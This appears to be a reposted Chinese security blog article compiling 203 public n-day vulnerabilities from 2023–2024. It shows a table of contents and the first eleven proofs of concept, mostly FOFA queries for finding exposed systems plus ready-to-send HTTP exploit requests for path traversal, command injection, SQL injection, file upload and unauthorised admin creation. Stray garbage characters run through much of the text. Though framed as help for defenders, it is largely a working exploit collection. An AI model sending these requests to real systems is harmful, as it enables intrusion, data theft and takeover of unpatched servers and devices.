互联网公开漏洞整理202309-2024062 n7 R9 D1 l& b# U
道一安全 2024-06-05 07:41 北京
L# @& v5 e* l, Z以下文章来源于网络安全新视界 ,作者网络安全新视界
9 e/ D8 }3 C- H( y: q
2 W! E' I$ F9 M5 M8 c发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。$ ~9 W, c7 ]$ F/ o, z$ D; r! `2 i! T& Y
. p+ w$ J) [1 ^0 @! [4 N/ ?
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
( E$ Z. Z4 G% f! A2 F" ^$ f7 [9 K6 m6 I* m/ l) ]9 q6 @9 e; s
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。3 E9 m# b3 \5 w! w
" L/ S: H- v" p) W
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
! u. E9 _ S, g2 z6 D; t; ?, C; k# k; x& z: j8 P/ k
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。1 O* G( f5 a7 B' _' v {
) A1 v/ N! C) N) i. \! {$ A# \" c* |! l3 T
声明
: T/ `& R+ r. W o5 N# x" s- N- p# C! Z9 f6 A
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
9 m, g/ w' |0 i/ y3 a4 q0 T
z6 @: y2 J' y* t( ~有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
) M& `" y* d( d6 z' W# g2 P! D
# R3 A9 D6 V. R% b) w. G) p Q0 R6 }- z# Y
" t2 J9 _) G/ J* Q& ~$ T
目录
) g' s" {4 r+ @
% a! t- B2 i }* ~/ r+ B01
! f- n5 `/ ^. I2 p( u, h0 d' W2 b c( w' q2 G, E9 C. p. d
1. StarRocks MPP数据库未授权访问
9 k( e( l) u, M% y/ e2. Casdoor系统static任意文件读取7 b9 m H' N# O; i
3. EasyCVR智能边缘网关 userlist 信息泄漏4 P e0 R$ z, H9 a2 |, q7 Y" n
4. EasyCVR视频管理平台存在任意用户添加
8 U8 P$ b- C) C$ a8 N7 L5 V3 s5. NUUO NVR 视频存储管理设备远程命令执行
% R c1 {( k7 U& m! F6. 深信服 NGAF 任意文件读取3 ^: \0 {, i, d& X1 M
7. 鸿运主动安全监控云平台任意文件下载
4 a( H& M& _) L4 Z' R8. 斐讯 Phicomm 路由器RCE/ y) ]5 ]6 M2 D" L+ e
9. 稻壳CMS keyword 未授权SQL注入
; y5 \% Z9 K/ }& w U% q10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
! T+ x4 F( o% l11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入! S1 E. T, h3 U0 `3 p% o- a
12. Jorani < 1.0.2 远程命令执行$ c! p- F% n) K' Z
13. 红帆iOffice ioFileDown任意文件读取
* j0 u- B% S7 N' D; p. t14. 华夏ERP(jshERP)敏感信息泄露$ Y5 l8 ^1 u) W" B; t
15. 华夏ERP getAllList信息泄露
8 n3 [5 u) \ v" `3 s16. 红帆HFOffice医微云SQL注入( K6 x8 c9 M7 w( x: X5 j$ o
17. 大华 DSS itcBulletin SQL 注入2 Z P4 h2 Q9 G. { {, O- q4 E# G
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露4 n9 U. A2 i8 M. Y' U/ E& N
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
( F/ H) u B! d/ B20. 大华ICC智能物联综合管理平台任意文件读取
0 I9 W3 K2 @) t# @5 {. f21. 大华ICC智能物联综合管理平台random远程代码执行# m7 G7 h' P1 J" ?7 J% W
22. 大华ICC智能物联综合管理平台 log4j远程代码执行: p6 t& R. ?5 d- w
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
, t: p: o' p# t24. 用友NC 6.5 accept.jsp任意文件上传3 X3 i5 V+ E$ `
25. 用友NC registerServlet JNDI 远程代码执行
1 b. L6 D3 k% E B26. 用友NC linkVoucher SQL注入- M5 V$ g! l; J$ o5 S! n! J q1 W7 F
27. 用友 NC showcontent SQL注入
$ d, n4 }; ?" f9 O; v4 a/ a28. 用友NC grouptemplet 任意文件上传
* B3 \) k8 p1 ?( w5 u29. 用友NC down/bill SQL注入6 [/ r8 J( h+ P3 L# j) b
30. 用友NC importPml SQL注入1 J* J( l/ {5 w& h6 I, I: V
31. 用友NC runStateServlet SQL注入$ T6 h' |* F a
32. 用友NC complainbilldetail SQL注入6 L& j. U! z' T
33. 用友NC downTax/download SQL注入8 I+ Y" e6 U" r- f' h$ Z$ Q
34. 用友NC warningDetailInfo接口SQL注入! J, n, y- [& w
35. 用友NC-Cloud importhttpscer任意文件上传
: U- n8 F8 A; k36. 用友NC-Cloud soapFormat XXE
' S& [ e4 q5 f) C37. 用友NC-Cloud IUpdateService XXE
% u8 R; Q1 u* E" b( q3 k38. 用友U8 Cloud smartweb2.RPC.d XXE
; A" a) _( C+ ?1 a. R& D) f39. 用友U8 Cloud RegisterServlet SQL注入: x( o0 K- f( k1 ?
40. 用友U8-Cloud XChangeServlet XXE
) w6 H; ~: n6 K# n3 k41. 用友U8 Cloud MeasureQueryByToolAction SQL注入, x2 H1 O, b1 H( R/ e x/ p
42. 用友GRP-U8 SmartUpload01 文件上传1 l1 N, b6 x) p
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
# b- s" M) \ G9 [, a44. 用友GRP-U8 bx_dj_check.jsp SQL注入/ c/ L8 u# l8 ?5 y/ O
45. 用友GRP-U8 ufgovbank XXE
j+ [+ X6 d. T5 k8 x1 U* w46. 用友GRP-U8 sqcxIndex.jsp SQL注入
) j, {8 e! n4 c- {7 \' l; s47. 用友GRP A++Cloud 政府财务云 任意文件读取/ @9 O7 X. J# g3 l
48. 用友U8 CRM swfupload 任意文件上传9 E: j/ c" j. e1 s
49. 用友U8 CRM系统uploadfile.php接口任意文件上传' Q) `% H! J1 n+ ]7 l
50. QDocs Smart School 6.4.1 filterRecords SQL注入: \5 y7 H$ Y+ }9 m2 L
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入* {, l1 q$ g% I% N, f
52. 泛微E-Office json_common.php sql注入( O+ e/ q+ U7 S+ v; T2 E
53. 迪普 DPTech VPN Service 任意文件上传
, N- S2 @. Y1 I" v p54. 畅捷通T+ getstorewarehousebystore 远程代码执行
3 b$ ?0 ]3 P) ~55. 畅捷通T+ getdecallusers信息泄露
; t! L u. x3 E; [* n56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE* ~# v& j' e# W
57. 畅捷通T+ keyEdit.aspx SQL注入# I7 V4 q! \! W
58. 畅捷通T+ KeyInfoList.aspx sql注入
4 X$ [6 O$ X1 E% L59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行0 u- N- ` R+ i6 x) a# ~. {' {
60. 百卓Smart管理平台 importexport.php SQL注入
9 V6 r1 c$ G% b% ?8 {- N) a61. 浙大恩特客户资源管理系统 fileupload 任意文件上传( Z: Q. Z. l a/ S& z% h
62. IP-guard WebServer 远程命令执行
% |5 d* R5 e0 Y3 L63. IP-guard WebServer任意文件读取
& H" ~, g# V7 \( z8 @. }64. 捷诚管理信息系统CWSFinanceCommon SQL注入
8 t0 I6 V- g$ [' Y. Q65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
( l' n$ w' E- }' ?' f, h66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入% `7 I* V$ S r
67. 万户ezOFFICE wpsservlet任意文件上传
+ z9 q0 N- n0 r( r D1 l+ P68. 万户ezOFFICE wf_printnum.jsp SQL注入# G) D7 l2 J0 L$ u- S% j9 K( u8 i- |
69. 万户 ezOFFICE contract_gd.jsp SQL注入
1 @0 V& F8 K0 g$ t: N4 d" Q70. 万户ezEIP success 命令执行. S1 c& R e4 r$ t7 \5 ^" k- H' k
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
) U" e# s6 N, ^* z3 K72. 致远OA getAjaxDataServlet XXE
" v( b% {8 z6 I73. GeoServer wms远程代码执行
5 [+ a! b9 L' w74. 致远M3-server 6_1sp1 反序列化RCE# t5 H v7 B# u$ F% m2 s
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
0 y6 I* D2 c' z' P; M, g76. 新开普掌上校园服务管理平台service.action远程命令执行
& e& p4 X9 h( Z; {! ]- e4 Q77. F22服装管理软件系统UploadHandler.ashx任意文件上传
! R1 l( K( ]0 V! z6 i78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传$ P2 g* ]7 v3 [2 ?
79. BYTEVALUE 百为流控路由器远程命令执行2 [$ D9 S) u- k/ ^. Z
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传2 o4 h0 G0 q% c- f# S( g+ H
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露- `2 `( J4 \: L# R) Q
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
& _$ ]% M1 t5 m) h& u8 P' D& O83. JeecgBoot testConnection 远程命令执行
1 u- W: i2 O5 i [84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
5 `# `. T& }5 r K4 j6 S85. SysAid On-premise< 23.3.36远程代码执行+ x' |+ j, V. U8 k8 V8 f5 J
86. 日本tosei自助洗衣机RCE1 ~# {- k5 o$ A( f" K" v/ r
87. 安恒明御安全网关aaa_local_web_preview文件上传5 C' n! z! G& e; t8 E' _
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行+ d2 F# c5 u/ ?/ v! B6 ]
89. 致远互联FE协作办公平台editflow_manager存在sql注入
; s; t e1 f I90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行& Z- z. v+ Q$ f2 }
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取& W( d1 Q- u9 x$ Y# d0 {0 g
92. 海康威视运行管理中心session命令执行! [" h4 G$ i2 T" {/ T
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传8 G% r3 Q% k, [) y8 `, V2 m( \
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
1 P6 T% H7 v' U, |9 l1 a95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行" }" j0 U5 V# i U0 W/ B
96. Apache OFBiz 18.12.11 groovy 远程代码执行( L* q: O% ]" F2 I
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
! @5 d. n3 |4 d98. SpiderFlow爬虫平台远程命令执行- g1 j! \. }8 M3 M& z# Y
99. Ncast盈可视高清智能录播系统busiFacade RCE6 b) j2 _# f y1 |/ A
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
2 J2 Y2 ]8 w$ F0 X9 }( X4 y" q101. ivanti policy secure-22.6命令注入
* k" |3 p! B# v102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
0 e8 w( u% ^9 V% A103. Ivanti Pulse Connect Secure VPN XXE
( u9 Z5 C- }+ {: u% Z. W104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露+ @# ^; U- T# V$ R+ z, V' |
105. SpringBlade v3.2.0 export-user SQL 注入
8 _- k; \' E3 G8 c+ L106. SpringBlade dict-biz/list SQL 注入
6 A7 B; N# \" z107. SpringBlade tenant/list SQL 注入
' E @( x4 |' p7 L! J108. D-Tale 3.9.0 SSRF
' E+ k$ y0 s% v5 {109. Jenkins CLI 任意文件读取
| E3 u" q9 i110. Goanywhere MFT 未授权创建管理员- |# I. v5 o$ g6 o0 c
111. WordPress Plugin HTML5 Video Player SQL注入
, m X2 `" k+ U1 U% Q) G/ B2 p112. WordPress Plugin NotificationX SQL 注入9 E/ m$ C2 ~( y* D |
113. WordPress Automatic 插件任意文件下载和SSRF2 m* o* @! s" B7 ?
114. WordPress MasterStudy LMS插件 SQL注入
$ R( d4 ^( L6 m- i) m) B115. WordPress Bricks Builder <= 1.9.6 RCE
: A; S5 A x2 V: w3 P. w116. wordpress js-support-ticket文件上传! G* l1 a U1 u% r% S# K
117. WordPress LayerSlider插件SQL注入6 e- j5 r( ~ S$ s( R2 M
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传5 `- z5 r, W/ g" @, ]
119. 北京百绰智能S20后台sysmanageajax.php sql注入1 W6 n' L) ~% Z7 w% ]" m9 H
120. 北京百绰智能S40管理平台导入web.php任意文件上传
* p n5 G1 j0 _% V3 ?121. 北京百绰智能S42管理平台userattestation.php任意文件上传
; c; h1 |( W7 v$ {6 D3 ~' ]" v122. 北京百绰智能s200管理平台/importexport.php sql注入
3 a( M/ K! l# w. E: z123. Atlassian Confluence 模板注入代码执行1 U6 i: U8 q9 T7 J% Q# s
124. 湖南建研工程质量检测系统任意文件上传, H( I. n7 B* `0 i2 o
125. ConnectWise ScreenConnect身份验证绕过
1 @8 t! k6 b( u0 `$ `3 p& K126. Aiohttp 路径遍历
& x5 T; G" \- Q% V127. 广联达Linkworks DataExchange.ashx XXE
( \( l# O# ^$ e1 T* a128. Adobe ColdFusion 反序列化
) R+ W0 x1 m+ j4 Z4 M! D( ]5 T4 G129. Adobe ColdFusion 任意文件读取9 M/ @0 Y9 n- x/ F1 m+ T+ B
130. Laykefu客服系统任意文件上传0 N5 f; s" w# Y9 f: }! b
131. Mini-Tmall <=20231017 SQL注入& d$ C" Y, w# e; x1 P& j
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过' q+ @9 U: A7 ?+ w; Q4 N( F8 Y
133. H5 云商城 file.php 文件上传) q9 k3 Y! Z! `% z3 A, ?& ]
134. 网康NS-ASG应用安全网关index.php sql注入
$ C$ }' _( `% F135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
- B9 t# h+ V2 _$ N- a2 s4 F136. NextChat cors SSRF" w5 V% O! ~) F$ u9 x4 L
137. 福建科立迅通信指挥调度平台down_file.php sql注入
6 ~" _* J' L/ V6 G2 t/ m2 K138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
/ k) Z/ T* O9 K$ q139. 福建科立讯通信指挥调度平台editemedia.php sql注入
. i/ y1 l P+ u2 ~8 `1 W7 [. Z: k140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入7 l$ k# b& \- h- a' @( v# l
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入! W0 h- y7 p/ e4 n4 V) V6 q
142. CMSV6车辆监控平台系统中存在弱密码
( x5 \, ^9 r& m0 m* R/ }! ]: Z143. Netis WF2780 v2.1.40144 远程命令执行* C" W7 |# s: v( Z7 R; m- {* x
144. D-Link nas_sharing.cgi 命令注入
A2 ]1 A/ [8 |0 D/ y4 n145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
2 N/ F: T6 ^' v$ U) [8 y# C2 Q146. MajorDoMo thumb.php 未授权远程代码执行
6 Z) v k: L( Q( H+ |147. RaidenMAILD邮件服务器v.4.9.4-路径遍历8 {" H: ]4 H% E4 Z; i
148. CrushFTP 认证绕过模板注入
7 w/ D8 ~+ V2 o' @149. AJ-Report开源数据大屏存在远程命令执行
9 T# h' q) h; a+ ?150. AJ-Report 1.4.0 认证绕过与远程代码执行
2 Q6 N0 l* r( c* G4 K! {; a% Y151. AJ-Report 1.4.1 pageList sql注入
# k0 N1 s! ^3 G- J; ]152. Progress Kemp LoadMaster 远程命令执行
! N( j; D( X$ q% z: n& O0 T153. gradio任意文件读取9 v5 O! P% N" B) {( x' R- P
154. 天维尔消防救援作战调度平台 SQL注入
. J: ]# I; ~5 B! I155. 六零导航页 file.php 任意文件上传! u+ c7 W# r2 e$ w. B$ \. d, @2 W
156. TBK DVR-4104/DVR-4216 操作系统命令注入
7 `8 ~0 v* X3 R1 a- \# i157. 美特CRM upload.jsp 任意文件上传8 t2 o( w/ K3 v( l
158. Mura-CMS-processAsyncObject存在SQL注入9 g) r& r5 v8 E1 Y4 |
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传$ [3 E. V+ e. B( r5 L2 ]
160. Sonatype Nexus Repository 3目录遍历与文件读取$ y+ O7 h) X2 J; C
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
2 \) {+ P2 ^2 O$ {( l' `162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传8 A; A7 U4 P6 c0 H6 d) N
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
1 V j' Z5 ?: G! G+ C, p8 l164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传. H; k) g7 m/ U& o
165. OrangeHRM 3.3.3 SQL 注入
; {; f: C `/ u% z4 y9 `166. 中成科信票务管理平台SeatMapHandler SQL注入2 R. T! j7 U- z$ C4 L
167. 精益价值管理系统 DownLoad.aspx任意文件读取
7 D; t% E+ w9 o8 Q168. 宏景EHR OutputCode 任意文件读取 B0 l2 v& |3 i% S6 j3 B4 s2 Q4 {
169. 宏景EHR downlawbase SQL注入
# R K9 H; x% |, T; y; ~$ A2 e170. 宏景EHR DisplayExcelCustomReport 任意文件读取
: N& \" q0 F$ N171. 通天星CMSV6车载定位监控平台 SQL注入
. W- m+ S0 R K6 I/ U) B# r0 F& b0 _172. DT-高清车牌识别摄像机任意文件读取' F8 L6 n5 g" u( t& Q3 M" M
173. Check Point 安全网关任意文件读取
+ V; o# s5 }) c3 S1 S* m/ s- t174. 金和OA C6 FileDownLoad.aspx 任意文件读取
* _" _% y. x3 r% t2 }6 y; `175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入0 f7 _) d2 L, D8 O* B# F
176. 电信网关配置管理系统 rewrite.php 文件上传: S! O- F6 R! _% Y( ^
177. H3C路由器敏感信息泄露
, g$ i* K; Z: o' O178. H3C校园网自助服务系统-flexfileupload-任意文件上传( v8 |% Y0 d' g7 P
179. 建文工程管理系统存在任意文件读取
# \" `/ Z& C& }2 Y9 B) A p+ }3 z6 n180. 帮管客 CRM jiliyu SQL注入
( F! f% C% ]5 P$ g4 g7 I181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
/ {3 m( P6 U5 q+ F6 K1 m& x# K* [182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
1 F3 |( L: o- j$ [183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入: s0 G7 m2 [) ~* Q( s5 a/ m# l- ?' [
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
: P7 F6 i( g, r: I+ \185. 瑞友天翼应用虚拟化系统SQL注入
4 g4 T& \- l: \7 O1 E- z186. F-logic DataCube3 SQL注入# b, ^7 D2 C# g0 F8 R
187. Mura CMS processAsyncObject SQL注入
8 a) }% @4 G2 S/ @- O188. 叁体-佳会视频会议 attachment 任意文件读取
( i/ P; W% T5 l0 L4 Q3 l189. 蓝网科技临床浏览系统 deleteStudy SQL注入
+ a2 R1 A) Y$ F190. 短视频矩阵营销系统 poihuoqu 任意文件读取
3 D' s s3 V* T" {- L, ~) c4 g6 ~191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
U0 X, ^ j: {7 }8 @- X192. 富通天下外贸ERP UploadEmailAttr 任意文件上传, v. `. q. N) q U$ X( B
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
# ~+ {* M0 o/ E2 a( `% O& z1 J194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传& S: W) O5 E- E5 E
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
( `6 s* L1 ?8 C J3 s196. 河南省风速科技统一认证平台密码重置2 W' O7 n0 T/ T+ k3 \; Y
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入/ \( _4 K) M2 F, B
198. 阿里云盘 WebDAV 命令注入
# U4 s3 d& h$ K, K199. cockpit系统assetsmanager_upload接口 文件上传
9 p/ I6 X! P [, C) e) G7 D) Q4 s200. SeaCMS海洋影视管理系统dmku SQL注入
9 l6 q" X6 t [5 p3 F8 Q( g201. 方正全媒体新闻采编系统 binary SQL注入, v& W( y5 v$ o
202. 微擎系统 AccountEdit任意文件上传+ Y W# c% V% @7 K2 k; Z
203. 红海云EHR PtFjk 文件上传4 e0 v/ w3 S1 `2 ~% H2 a+ |( t+ ^
# _4 a& t% E7 [* Z9 M2 o; MPOC列表
) D: F6 X8 \0 v/ H6 x# D v% t
0 w1 ~. t3 r* }. j, k, E02+ l7 E2 V' y g" h" U- m
# q1 v5 }3 E, m7 ?1. StarRocks MPP数据库未授权访问
# \5 E3 j" f6 d0 }% w. k; EFOFA :title="StarRocks"- E! Z" D& T; Q7 i8 M! ]) Z- Q
GET /mem_tracker HTTP/1.16 b4 x1 b% K+ u: p, z8 u: J
Host: URL, A6 G1 T: [9 f4 `+ u4 W& S
. G: Q; J4 B& y( s, ~+ }: R
( `! D" O+ S& i8 u ^; |2. Casdoor系统static任意文件读取
3 t1 [( y/ I( l: s4 G0 tFOFA :title="Casdoor"
. }9 k6 u4 `: _8 BGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
/ O6 e, v0 t/ lHost: xx.xx.xx.xx:9999
; m* O |6 r. Z4 U1 C: Z) X% h1 \User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 l: A( S* l& M# }2 | ?) L! F2 W' } t
Connection: close: J+ J0 k% {& `
Accept: */*) w* I: W# z4 X9 x
Accept-Language: en$ ]/ ~0 x' z. V1 O. s/ m
Accept-Encoding: gzip
) g L4 w O% }) v4 U
/ f: ]! H7 r! @8 X* k5 X2 e4 O, n
3. EasyCVR智能边缘网关 userlist 信息泄漏" z- Q. p* G- g) X* A$ `5 [0 e
FOFA :title="EasyCVR"
5 _; _8 X8 H. ?7 F, hGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
8 l; l9 c) R! B2 \7 [! u0 @- j( `Host: xx.xx.xx.xx
( c# L8 o2 X5 t7 x9 l0 t
* J% N# i" t# z, D0 ^+ i) y; Y( u- ]8 S! y" ^
4. EasyCVR视频管理平台存在任意用户添加. B+ o& ~1 w& ^$ j
FOFA :title="EasyCVR"
6 a$ ]# ~6 W2 M" W! Y8 @5 `
/ ]( u6 d% A& y! @( spassword更改为自己的密码md54 R; K% \: k( u2 a
POST /api/v1/adduser HTTP/1.1
4 F2 U! B7 B* U: g/ jHost: your-ip0 M0 S: D* W0 K( c0 `- g; v b
Content-Type: application/x-www-form-urlencoded; charset=UTF-85 E& Q+ A% D- x+ E. S$ \
4 i1 g, @1 n3 a# R$ N/ r: N, s K: v
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1; u4 ] k" T7 M) V: |) Q
' C) [! y. k c( q& c( U0 i9 J$ C4 y- a1 K ]0 U
5. NUUO NVR 视频存储管理设备远程命令执行
7 b6 f: K) t! j" v) f4 ?% RFOFA:title="Network Video Recorder Login"3 T. M# T9 w2 `+ f$ q
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
8 T" o/ S8 h- l1 L( S1 lHost: xx.xx.xx.xx6 {/ g& L& s, ~( H! Y r1 H
$ x2 {' t: ^* c$ `3 m5 Y7 r& d( R
, f: w5 r4 G8 h$ Y7 S
6. 深信服 NGAF 任意文件读取
3 I' R' Q# s( k7 PFOFA:title="SANGFOR | NGAF"1 `% [0 p/ G6 l3 Q, G
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
9 {: w! }2 I/ b( xHost:
X( Y1 L; c9 y1 _/ z0 P0 D& C: P& `0 J4 M5 g5 N
" z, U7 _" Z$ E9 ~! I8 v8 s7. 鸿运主动安全监控云平台任意文件下载8 ^5 x" i; b/ A
FOFA:body="./open/webApi.html"
' ]! J; M* c g% ~GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.19 s- {' c' \- M: p* Y( W, b
Host:/ x. I# F1 \2 V, \! d- F
1 E$ [5 N9 d. |
! ]/ Z; L0 D3 p. t) |: D8 R# q. {8. 斐讯 Phicomm 路由器RCE, y: O& B9 _" v! l3 g
FOFA:icon_hash="-1344736688") W1 d2 f7 d& r6 H3 Q
默认账号admin登录后台后,执行操作. Y9 i/ G& {& m/ l; H
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
/ o S+ z( w+ a) SHost: x.x.x.x8 D: f8 \! s! w* p
Cookie: sysauth=第一步登录获取的cookie# j. `, O$ t! m% F1 A
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz+ ^6 ?- }/ t8 y, C5 Q; q$ K
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
( g9 v8 @( Y, K2 Y/ I- Y: Y) z
. K1 u4 }$ W& N4 g% A1 i------WebKitFormBoundaryxbgjoytz
- p' y9 W( p2 T5 A7 c$ \8 `2 RContent-Disposition: form-data; name="wifiRebootEnablestatus"
2 J7 n. _6 l% @3 @) A' N$ h9 g4 Z9 r/ b
%s
. u; ]2 s' e& L------WebKitFormBoundaryxbgjoytz
5 g" y7 `( N. `Content-Disposition: form-data; name="wifiRebootrange"6 ~1 K7 V4 y ?, ~1 Y3 R
8 h3 Q& `8 N+ {. \& w5 k& D12:00; id;& r9 k+ V8 G8 V$ Z- ~0 @- v9 G: q( l, \
------WebKitFormBoundaryxbgjoytz
, B4 n8 b- r- N' rContent-Disposition: form-data; name="wifiRebootendrange": w1 s% B0 b9 d6 U
* ^+ u$ B; A: V- h: ~
%s:- L& X! m: ?( k+ C7 {" y
------WebKitFormBoundaryxbgjoytz2 l( F! ^. O. a- O5 B
Content-Disposition: form-data; name="cururl2"
1 x" V' d, S0 y; m$ q: h# T0 [9 H3 @/ h, o9 l0 X
+ M9 r1 e0 A. ~9 [" d- r( l
------WebKitFormBoundaryxbgjoytz--
) z8 N1 k4 X5 \6 A) t2 T, f, M2 G( y( m! _1 ~' J: \% U! L
: T5 c$ `7 m% }, W( W5 W' G! t: D
9. 稻壳CMS keyword 未授权SQL注入
' x6 C; U/ k5 `! b: Y$ c$ vFOFA:app="Doccms"
: ?, P: V1 u, o% CGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1! k! a2 X) q! j3 b
Host: x.x.x.x
' E3 g. i& j/ X$ o3 X4 O/ x+ P9 g8 j2 p. Y) P6 J* y# c& M
G7 M5 p+ s( qpayload为下列语句的二次Url编码$ ^1 c2 A5 t9 e
( {5 ]% J Z/ \+ x1 A. v# a, |' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
! D" e* p3 D0 E/ H- g( D$ v3 e ?" A z7 x8 _; [2 h% i: A) d$ Y
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
% R" S+ q% b& ~( `FOFA:icon_hash="953405444"
2 d; ^ K; U2 y" e. M' }
! ^0 f; s: S. }* ~8 O' G$ n4 B文件上传后响应中包含上传文件的路径* _+ Y! j. V$ E0 `5 C( s% b; x
POST /eis/service/api.aspx?action=saveImg HTTP/1.1. y% e( K( _: { l
Host: x.x.x.x:xx
7 C- P' U$ a7 @0 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
. g6 b. }$ M+ LContent-Length: 197: f5 e- T f+ G5 h/ {3 u4 \$ S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9, _# j! d3 e; q2 v! o" ~# u9 M: I
Accept-Encoding: gzip, deflate2 x9 t) b& o6 B/ S$ A
Accept-Language: zh-CN,zh;q=0.9
! ~ W* b8 A+ B. f) P: M# PConnection: close* m2 F- _" h G
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu1 k W2 y5 N T! @
- G: Y7 N P$ Z! [- c0 l8 L
------WebKitFormBoundaryxdgaqmqu
$ T. V! q* X: M5 tContent-Disposition: form-data; name="file"filename="icfitnya.txt"& m4 H5 z( l" S1 A! E( Q
Content-Type: text/html
4 {1 X, U* Y, ]4 Y. I) d3 ~3 ^. L7 T0 e, X" d' u9 ~# i
jmnqjfdsupxgfidopeixbgsxbf/ Z t9 e9 E6 g9 `
------WebKitFormBoundaryxdgaqmqu--9 P x# Z& V. L# e
, Y- J# S, }0 L) g# |4 M& ]
; U2 j' Z; f* {4 C2 s9 A11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
' X. Y1 W, B9 ^7 s9 o1 SFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"8 p* Y2 ?1 h' w& ]& n
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
2 F: Y% v' ^0 W9 T) qHost: 127.0.0.1
